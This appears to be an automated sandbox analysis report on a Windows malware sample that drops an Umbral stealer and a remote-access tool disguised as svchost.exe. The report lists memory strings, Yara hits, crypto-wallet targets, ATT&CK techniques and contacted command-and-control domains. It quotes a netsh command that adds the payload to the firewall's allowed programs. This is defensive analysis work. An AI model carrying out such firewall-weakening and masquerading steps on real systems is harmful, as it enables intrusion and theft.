              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:43:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:44:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:52:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:35:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:28:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:08:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:39:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:55:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:00:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:20:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:59:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:24:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:45:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:59:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:47:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:45:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:55:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:42:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:09:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:03:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:37:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:59:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:51:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:27:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:59:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:40:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:16:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:28:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:24:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:24:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:59:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:16:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:22:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:18:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:20:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:42:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:05:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:54:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:38:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:31:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:30:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 11:53:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:33:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:38:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:41:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:56:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:41:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:10:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:46:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:39:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:13:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:03:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:17:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:49:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:18:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:10:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:58:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:01:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:08:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:15:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:51:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:22:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:07:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:28:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:48:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:36:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:13:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:07:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:54:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:36:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:04:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:52:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:04:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:39:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:07:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:44:02 - Program Manager
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe Queries volume information: C:\Users\user\Desktop\KvS2rT08PQ.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: svchost.exe.0.dr, Fransesco.cs | .Net Code: INS
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE

Stealing of Sensitive Information

Source: Yara match | File source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: Electrum
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: Exodus
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: Ethereum
Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: keystore
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques with a signature hit, per tactic; the number in parentheses is the count shown in the matrix cell, copied as displayed; cells of the navigator grid without a count carried no match and are not listed)

Reconnaissance: none
Resource Development: none
Initial Access: Replication Through Removable Media (11)
Execution: Windows Management Instrumentation (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (112)
Defense Evasion: Disable or Modify Tools (41); Obfuscated Files or Information (21); Software Packing (13); Timestomp (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (112)
Credential Access: none
Discovery: Peripheral Device Discovery (1); File and Directory Discovery (1); System Information Discovery (22); Query Registry (1); Security Software Discovery (211); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1); Data from Local System (1); Clipboard Data (1)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (3); Application Layer Protocol (14)
Exfiltration: none
Impact: none
Behavior Graph ID: 1429103 | Sample: KvS2rT08PQ.exe | Start date: 20/04/2024 | Architecture: WINDOWS | Score: 100

Contacted domains: 0.tcp.eu.ngrok.io, keyauth.win, ip-api.com
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures

KvS2rT08PQ.exe (started)
  dropped: C:\Users\user\AppData\Local\...\svchost.exe (PE32); C:\Users\user\AppData\Local\Temp\Umbral.exe (PE32); C:\Users\user\...\ANDYzz-protected.exe (PE32+)
  signature: Drops PE files with benign system names
  +-- svchost.exe (started)
